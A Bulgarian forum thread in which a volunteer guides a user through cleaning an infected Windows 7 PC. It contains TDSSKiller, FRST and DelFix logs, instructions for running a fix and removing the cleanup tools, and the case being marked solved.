19:28:54.0756 0x0744  [ AA53356D60AF47EACC85BC617A4F3F66, 155CB8112AA382D841C1891750FF29EF4F1BF716CD9CDF0F2243209E2CCCAC98 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
19:28:54.0761 0x0744  WPDBusEnum - ok
19:28:54.0779 0x0744  [ 6DB3276587B853BF886B69528FDB048C, 9972FF6DF0DF6F86D1E9BCEF4C29064748B217DA196B0633C30D3D580144951C ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
19:28:54.0781 0x0744  ws2ifsl - ok
19:28:54.0786 0x0744  WSearch - ok
19:28:54.0796 0x0744  [ E714A1C0354636837E20CCBF00888EE7, 0E31F0DB0AA318E3B0DACD26C0D3B11519B42F2A996AE580BE67FA8B3C42C436 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
19:28:54.0799 0x0744  WudfPf - ok
19:28:54.0827 0x0744  [ 1023EE888C9B47178C5293ED5336AB69, 62221C80C3F719A585266247482A64F7CB2F5EF69AFA8FA07D563CA2B0A37561 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
19:28:54.0832 0x0744  WUDFRd - ok
19:28:54.0855 0x0744  [ 8D1E1E529A2C9E9B6A85B55A345F7629, 64B637CFE2AF58A4F7CE6D8C3D603F8EFD527500F7137E0A37840313C712CA93 ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
19:28:54.0861 0x0744  wudfsvc - ok
19:28:54.0880 0x0744  [ FF2D745B560F7C71B31F30F4D49F73D2, B2FBF7E5F58E34AC64FE6CF65800F1F07939279203BDE89375FAC92B884A4F37 ] WwanSvc         C:\Windows\System32\wwansvc.dll
19:28:54.0888 0x0744  WwanSvc - ok
19:28:54.0899 0x0744  ================ Scan global ===============================
19:28:54.0936 0x0744  [ DAB748AE0439955ED2FA22357533DDDB, 73EDD402C7479DDCE1998D0C7E99E1EC2974F64EFC33A851439CC85D09EDCDF9 ] C:\Windows\system32\basesrv.dll
19:28:54.0956 0x0744  [ A9F564F254E9DDDE120A7135767EC24B, F255DCB4C7F4F941BA27700D66684AD0BA3DF114D6F298E2A909095B71B11D94 ] C:\Windows\system32\winsrv.dll
19:28:54.0970 0x0744  [ A9F564F254E9DDDE120A7135767EC24B, F255DCB4C7F4F941BA27700D66684AD0BA3DF114D6F298E2A909095B71B11D94 ] C:\Windows\system32\winsrv.dll
19:28:55.0008 0x0744  [ 364455805E64882844EE9ACB72522830, 906561DBBB33F744844CF27E456226044C85DF0FCFD26DE1FD11E09E2CFA6F8F ] C:\Windows\system32\sxssrv.dll
19:28:55.0043 0x0744  [ 5F1B6A9C35D3D5CA72D6D6FDEF9747D6, D7BC4ED605B32274B45328FD9914FB0E7B90D869A38F0E6F94FB1BF4E9E2B407 ] C:\Windows\system32\services.exe
19:28:55.0055 0x0744  [ Global ] - ok
19:28:55.0056 0x0744  ================ Scan MBR ==================================
19:28:55.0073 0x0744  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
19:28:55.0456 0x0744  \Device\Harddisk0\DR0 - ok
19:28:55.0456 0x0744  ================ Scan VBR ==================================
19:28:55.0461 0x0744  [ CF0C747F614B6EF3F6CCDE0C0BEF3F95 ] \Device\Harddisk0\DR0\Partition1
19:28:55.0465 0x0744  \Device\Harddisk0\DR0\Partition1 - ok
19:28:55.0469 0x0744  [ 4AA3FFE90E2DDB136751BA470540FD44 ] \Device\Harddisk0\DR0\Partition2
19:28:55.0471 0x0744  \Device\Harddisk0\DR0\Partition2 - ok
19:28:55.0475 0x0744  [ 38A5DD394AB14888AD93D013D919244F ] \Device\Harddisk0\DR0\Partition3
19:28:55.0477 0x0744  \Device\Harddisk0\DR0\Partition3 - ok
19:28:55.0478 0x0744  ================ Scan generic autorun ======================
19:28:55.0599 0x0744  [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files\Windows Sidebar\Sidebar.exe
19:28:55.0642 0x0744  Sidebar - ok
19:28:55.0667 0x0744  [ BBA1A5B86134F496B926DDAF247DB871, 636990AE49C55189B7EF69C419787440B57EC0BAD98A9C280E1028F741BB222E ] C:\Windows\System32\mctadmin.exe
19:28:55.0671 0x0744  mctadmin - ok
19:28:55.0724 0x0744  [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files\Windows Sidebar\Sidebar.exe
19:28:55.0745 0x0744  Sidebar - ok
19:28:55.0753 0x0744  [ BBA1A5B86134F496B926DDAF247DB871, 636990AE49C55189B7EF69C419787440B57EC0BAD98A9C280E1028F741BB222E ] C:\Windows\System32\mctadmin.exe
19:28:55.0756 0x0744  mctadmin - ok
19:28:55.0757 0x0744  Waiting for KSN requests completion. In queue: 320
19:28:56.0757 0x0744  Waiting for KSN requests completion. In queue: 320
19:28:57.0757 0x0744  Waiting for KSN requests completion. In queue: 12
19:28:58.0807 0x0744  Win FW state via NFP2: enabled ( trusted )
19:29:01.0504 0x0744  ============================================================
19:29:01.0504 0x0744  Scan finished
19:29:01.0504 0x0744  ============================================================
19:29:01.0524 0x07c0  Detected object count: 0
19:29:01.0524 0x07c0  Actual detected object count: 0
19:30:37.0304 0x0ee0  Deinitialize success
 

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Супер..! Да направим едни контролни сканирания да огледам последно и ще се ориентираме към финал..! :)

 

Сканиране с Farbar Recovery Scan

  • Моля изтеглете icon1337953436.pngFarbar Recovery Scan Tool (според версията на Windows изберете 32 битовата или 64 битовата версия) и го запазете на десктопа.
  • Стартирайте файла FRST.exe (или FRST64.exe)
  • Програмата ще се стартира. Натиснете YES за да се съгласите с лицензионното споразумение.
  • Натиснете бутона YClYkft.jpg.
  • Изчакайте търпеливо проверката да приключи.
  • Ще се създадат два лог файла с името - FRST.txt и Addition.txt на десктопа.
  • Копирайте съдържанието на файла FRST.txt в следващия си пост.Прикачете Addition.txt в коментар си (погледнете опцията Прикачване на файлове, когато публикувате мнение).

pfNZP4A.png&key=0a487e0a7cff89c690a32d13  Дневници 

В следващия си отговор, моля да включите (като копирате целите съдържания ) следните дневници:

  • FRST.txt (копирате цялото съдържание)
  • Addition.txt (прикачате..) 

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2019
Ran by ВЕС (administrator) on WIN-SKFJ6HLGST2 (04-01-2019 19:43:03)
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\...\Drivers32: [MSVideo8] => C:\Windows\system32\VfWWDM32.dll [56832 2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}] -> C:\Windows\System32\iedkcs32.dll [2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2019-01-03] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{840DEA2A-8553-4D25-A5FB-7DB86C5BFBE5}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{EE11610E-0BCC-42A7-A0AC-89B4A3B92BF1}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-xl/?ocid=iehp

FireFox:
========
FF ProfilePath: C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default [2019-01-03]
FF user.js: detected! => C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default\user.js [2006-04-06]
FF Extension: (NewsFox) - C:\Users\ВЕС\Downloads\k-meleon\browser\extensions\{899DF1F8-2F43-4394-8315-37F6744E6319}.xpi [2016-01-04] [Legacy] [not signed]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]

Chrome: 
=======
CHR HomePage: Default -> hxxp://google.bg/
CHR Profile: C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default [2019-01-04]
CHR Extension: (Lightshot (скрииншот инструмент)) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbniclmhobmnbdlbpiphghaielnnpgdp [2019-01-03]
CHR Extension: (Плащания в уеб магазина на Chrome) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-01-03]
CHR Extension: (Chrome Media Router) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-03]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [375776 2018-12-12] (Google Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [5073376 2018-09-19] (Malwarebytes)
S2 gupdate; "C:\Program Files\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files\Google\Update\GoogleUpdate.exe" /medsvc [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae.sys [129248 2018-12-04] (Malwarebytes)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [172280 2019-01-04] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [106144 2019-01-04] (Malwarebytes)
R3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [63760 2019-01-04] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [230120 2019-01-04] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [83648 2019-01-04] (Malwarebytes)
U3 TrueSight; \??\C:\Windows\System32\drivers\truesight.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 19:28 - 2019-01-04 19:30 - 000186628 _____ C:\TDSSKiller.3.1.0.25_04.01.2019_19.28.10_log.txt
2019-01-04 19:27 - 2019-01-04 19:27 - 005073416 _____ (AO Kaspersky Lab) C:\Users\ВЕС\Downloads\tdsskiller.exe
2019-01-04 19:27 - 2019-01-04 19:27 - 000063760 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-01-04 19:26 - 2019-01-04 19:26 - 000230120 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-01-04 19:26 - 2019-01-04 19:26 - 000106144 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-01-04 19:26 - 2019-01-04 19:26 - 000083648 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-01-04 18:55 - 2019-01-04 18:55 - 000463872 _____ C:\Windows\system32\LBA-0-128-k
2019-01-04 18:52 - 2019-01-04 18:52 - 000172280 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-01-04 18:52 - 2019-01-04 18:52 - 000002020 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-01-04 18:52 - 2019-01-04 18:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-04 18:52 - 2018-12-04 08:09 - 000129248 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2019-01-04 18:51 - 2019-01-04 18:51 - 081227760 _____ (Malwarebytes ) C:\Users\ВЕС\Downloads\mb3-setup-consumer-3.6.1.2711-1.0.508-1.0.8211 (1).exe
2019-01-04 16:30 - 2019-01-04 16:30 - 000005319 _____ C:\Users\ВЕС\Documents\Fixlog.txt
2019-01-04 16:30 - 2019-01-04 16:30 - 000003620 _____ C:\Users\ВЕС\Documents\fixlist.txt
2019-01-04 03:15 - 2019-01-04 03:15 - 000001345 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2019-01-04 03:15 - 2019-01-04 03:15 - 000001326 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2019-01-04 03:14 - 2019-01-04 03:14 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_09_00.Wdf
2019-01-04 03:10 - 2019-01-03 18:31 - 000000000 ____D C:\Windows\Panther
2019-01-04 03:03 - 2019-01-04 03:03 - 000000000 ____D C:\Windows.old
2019-01-03 20:43 - 2019-01-04 19:43 - 000005530 _____ C:\Users\ВЕС\Downloads\FRST.txt
2019-01-03 20:43 - 2019-01-04 19:43 - 000000000 ____D C:\FRST
2019-01-03 20:43 - 2019-01-03 20:43 - 001783808 _____ (Farbar) C:\Users\ВЕС\Downloads\FRST.exe
2019-01-03 20:03 - 2019-01-03 20:03 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbam
2019-01-03 20:02 - 2019-01-04 18:52 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbamtray
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Program Files\Malwarebytes
2019-01-03 20:00 - 2019-01-03 20:01 - 081227760 _____ (Malwarebytes ) C:\Users\ВЕС\Downloads\mb3-setup-consumer-3.6.1.2711-1.0.508-1.0.8211.exe
2019-01-03 19:40 - 2019-01-03 19:40 - 029162424 _____ (Adlice Software ) C:\Users\ВЕС\Downloads\RogueKiller_setup.exe
2019-01-03 19:34 - 2019-01-04 16:29 - 000383916 _____ C:\Windows\ntbtlog.txt
2019-01-03 19:30 - 2019-01-03 19:30 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:09 - 2019-01-03 19:09 - 000000009 _____ C:\Users\ВЕС\rstr1.ini
2019-01-03 19:07 - 2019-01-03 19:07 - 000000258 __RSH C:\Users\ВЕС\ntuser.pol
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Michael
2019-01-03 19:01 - 2019-01-03 19:19 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ShopMore
2019-01-03 19:01 - 2019-01-03 19:07 - 000002964 __RSH C:\ProgramData\ntuser.pol
2019-01-03 19:01 - 2019-01-03 19:01 - 000493800 _____ (VideoDriver) C:\Windows\D04DE5140B2D.sys
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Python
2019-01-03 19:00 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ezc3lfxnx4j
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ C:\Users\ВЕС\AppData\Local\wbem.ini
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{AC10FE2E-1A46-0496-3E07-15883EE04CD9}
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{59403C6F-D807-F1C6-7FC5-457D7F221C2C}
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:56 - 2015-08-03 08:53 - 000384000 _____ (SafeIP) C:\Windows\system32\SafeIPs.dll
2019-01-03 18:55 - 2019-01-03 20:05 - 000000000 ____D C:\Program Files\KMSPico 10.2.1 Final
2019-01-03 18:53 - 2018-12-10 23:04 - 000499424 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-01-03 18:48 - 2019-01-03 18:48 - 001259736 _____ (Plarium) C:\Users\ВЕС\Downloads\PlariumPlaySetup (1).exe
2019-01-03 18:46 - 2019-01-03 18:46 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Package Cache
2019-01-03 18:45 - 2019-01-03 19:03 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Mozilla
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\K-Meleon
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Local\K-Meleon
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Plarium
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\CEF
2019-01-03 18:39 - 2019-01-03 18:39 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Google
2019-01-03 18:38 - 2019-01-03 19:53 - 000002202 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-01-03 18:38 - 2019-01-03 19:53 - 000002161 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-01-03 18:37 - 2019-01-03 19:02 - 000000000 ____D C:\Program Files\Google
2019-01-03 18:37 - 2019-01-03 19:00 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Google
2019-01-03 18:37 - 2019-01-03 18:37 - 000057560 _____ C:\Users\ВЕС\AppData\Local\GDIPFONTCACHEV1.DAT
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Deployment
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Apps\2.0
2019-01-03 18:36 - 2014-05-14 17:23 - 001973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2019-01-03 18:36 - 2014-05-14 17:23 - 000054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2019-01-03 18:36 - 2014-05-14 17:23 - 000045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2019-01-03 18:36 - 2014-05-14 17:17 - 002425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2019-01-03 18:36 - 2014-05-14 09:23 - 000179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2019-01-03 18:36 - 2014-05-14 09:17 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2019-01-03 18:33 - 2019-01-03 19:53 - 000001335 _____ C:\Users\ВЕС\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-03 18:33 - 2019-01-03 19:09 - 000000000 ____D C:\Users\ВЕС
2019-01-03 18:33 - 2019-01-03 18:33 - 000000020 ___SH C:\Users\ВЕС\ntuser.ini
2019-01-03 18:33 - 2019-01-03 18:33 - 000000000 ____D C:\Users\ВЕС\AppData\Local\VirtualStore
2019-01-03 18:33 - 2010-11-21 01:46 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Media Center Programs
2019-01-03 16:27 - 2019-01-03 16:27 - 000000000 ____D C:\My Drivers
2018-12-30 08:50 - 2018-12-30 08:50 - 005183296 _____ (Marcin Szeniak ) C:\Users\ВЕС\Downloads\BCUninstaller_4.12.1_setup.exe
2018-12-29 13:35 - 2018-12-29 13:35 - 000000000 ____D C:\SWSetup

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 19:32 - 2010-11-20 22:01 - 000713888 _____ C:\Windows\system32\PerfStringBackup.INI
2019-01-04 19:32 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\inf
2019-01-04 19:26 - 2009-07-14 05:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-01-04 19:25 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-01-04 19:25 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-01-04 03:15 - 2009-07-14 05:52 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2019-01-04 03:15 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\sysprep
2019-01-04 03:12 - 2010-11-21 01:46 - 000000000 ____D C:\Windows\CSC
2019-01-04 03:10 - 2009-07-14 05:52 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2019-01-03 19:01 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\GroupPolicy
2019-01-03 18:57 - 2018-08-11 19:54 - 000000000 ____D C:\Intel
2019-01-03 18:57 - 2017-10-21 13:53 - 000000000 ____D C:\LFS
2019-01-03 18:57 - 2017-09-25 20:50 - 000000000 ___RD C:\BECKO-PC
2019-01-03 18:57 - 2017-04-14 15:10 - 000036892 ____H C:\iCS Source.suo.nybmyxmig
2019-01-03 18:33 - 2009-07-14 05:33 - 000266808 _____ C:\Windows\system32\FNTCACHE.DAT
2019-01-03 18:31 - 2009-07-14 03:37 - 000000000 __RHD C:\Users\Public\Libraries
2019-01-03 17:30 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\rescache
2019-01-03 15:34 - 2018-08-11 14:17 - 000000000 ____D C:\Users\ВЕС\Downloads\k-meleon
2019-01-01 13:09 - 2018-09-02 13:32 - 000000000 ____D C:\Users\ВЕС\Documents\TalkHelper

==================== Files in the root of some directories =======

1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Users\ВЕС\AppData\Local\aIQEonJ.exe
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ () C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ () C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ () C:\Users\ВЕС\AppData\Local\wbem.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-01-04 03:11

==================== End of FRST.txt ============================

Addition.txt

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Фикс с Farbar Recovery Scan Tool
 
icon13.gif Изтеглете прикачения файл
 fixlist.txt и го запазете там, където сте свалили FRST.exe
Стартирайте отново FRST.exe и натиснете бутона Fix веднъж и изчакайте.

Press%20the%20FIX%20button_zpsdd5zi3mt.p


Ще се създаде нов лог файла FixLog.txt. Прикачете съдържанието му в следващия си коментар.
 
ЗАБЕЛЕЖКА: Този скрипт е написан специално за този потребител,и за тази конкретна машина. Изпълнението на фикса, на друг компютър може да доведе до увреждане на  операционната ви система

 

pfNZP4A.png  Дневници
 
В следващия си отговор, моля да включите следните дневници:

  • FixLog.txt

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Ами това ще е от мен...Как е системата ви сега..? Нещо да забелязвате и то да ви притеснява..?

 

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Системата е добре, благодаря за отделеното време и внимание

  • Харесва ми 1

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Остана само да премахнем програмите които използвахме:

За да премахнете правилно инструмента Farbar Recovery Scan Tool  , преименувайте изпълнимия файл FRST64.exe (или FRST.exe) в Uninstall.exe..!

image.png.9cf9e0ab76b122782aff3552f54c5829.png     =>     image.png.44f957ce25ef61c76206655a46425152.png

Стартирайте  файла Uninstall.exe. Ще бъдете уведомени, че трябва да рестартирате системата, за да изтриете инструмента ..!

image.png.abcc20b28654d54fae08e7451bb5dc3b.png

 

 

Изтеглете DelFix и го стартирайте. Сложете отметка пред:

  • Remove disinfection tools <----- това ще премахне инструментите които сме използвали
  • Create registry backup <----- тази опция ще създадете резервно копие от регистъра на Windows
  • Purge system restore <---  това ще премахне всички предишни точки за възстановяване, ще бъде създадена нова точка  на състоянието на системата в момента.
  • Reset system settings <--- това ще нулира всички настройки на системата и по подразбиране, които са били променени или от нас по време на почистването или от зловреден софтуер / инфекция

DelFix.png

..и след това натиснете бутона Run

  • След като операцията е завърши,ще се създаде дневник
  • Копирате го и го поставите в следващия си отговор

Инструмента ще се самоизтрие след като приключи своята задача!

 

pfNZP4A.png&key=0a487e0a7cff89c690a32d13  Дневници :

В следващия си отговор, моля да включите следните дневници:

  • DelFix 

 

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

# DelFix v1.013 - Logfile created 04/01/2019 at 20:29:37
# Updated 17/04/2016 by Xplode
# Username : ВЕС - WIN-SKFJ6HLGST2
# Operating System : Windows 7 Ultimate Service Pack 1 (32 bits)

~ Removing disinfection tools ...

Deleted : C:\TDSSKiller.3.1.0.25_04.01.2019_19.28.10_log.txt
Deleted : C:\Users\ВЕС\Downloads\tdsskiller.exe

~ Creating registry backup ... OK

~ Cleaning system restore ...

Deleted : RP #3 [Windows Update | 01/03/2019 17:36:13]
Deleted : RP #4 [Windows Update | 01/03/2019 17:53:03]
Deleted : RP #6 [Restore Point Created by FRST | 01/04/2019 19:05:14]

New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########
 

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Прекрасно..! :)  Благодаря ви за коректната работа..!   Маркирам случая за "Решен"...! Пожелавам лека вечер и  безопасен интернет..!  :)

  • Харесва ми 2

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Лека вечер

 

  • Харесва ми 1

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Регистрирайте се или влезете в профила си за да коментирате

Трябва да имате регистрация за да може да коментирате това

Регистрирайте се

Създайте нова регистрация в нашия форум. Лесно е!

Нова регистрация

Вход

Имате регистрация? Влезте от тук.

Вход

  • Разглеждащи това в момента   0 потребители

    Няма регистрирани потребители разглеждащи тази страница.

  • Подобни теми

    • от sv3tlio
      Здравейте на всички! Ще гледам да съм максимално кратък и ще карам направо. Както виждате от заглавието на темата имам проблем с Хромиум. Като цяло проблемът ми е доста сходен с този : https://www.kaldata.com/forums/topic/270658-след-зареждане-на-windows-се-стартира-chromium/ . Същата работа е при мен. Преди около седмица си изтеглих BS Player, и от тогава се появи и този Chromium. BS Player-ът го изтеглих баш от сайта им, не от някакво измислено място, но явно и от там няма гаранция. Както и да е. Всеки път като се включи компютъра, било то след рестарт, или обикновено включване (това е само след пълно изключване на компютъра, когато го включа след "режим на готовност", този проблем го няма) веднага ми отваря Chromium и по-точно раздела history. На пръв поглед е все едно гледам Chrome, но не е. Отначало когато за пръв път се появи имаше историята от Chrome + каквито видео файлове съм пускал. Примерно влизал съм в еди си кой сайт, гледал съм еди си кой филм. Помъчих се да го деинсталирам обаче не става (ще приложа снимки какво точно ми излиза). 

      След като щракна върху Промени/премахни, пък ми излиза това: 

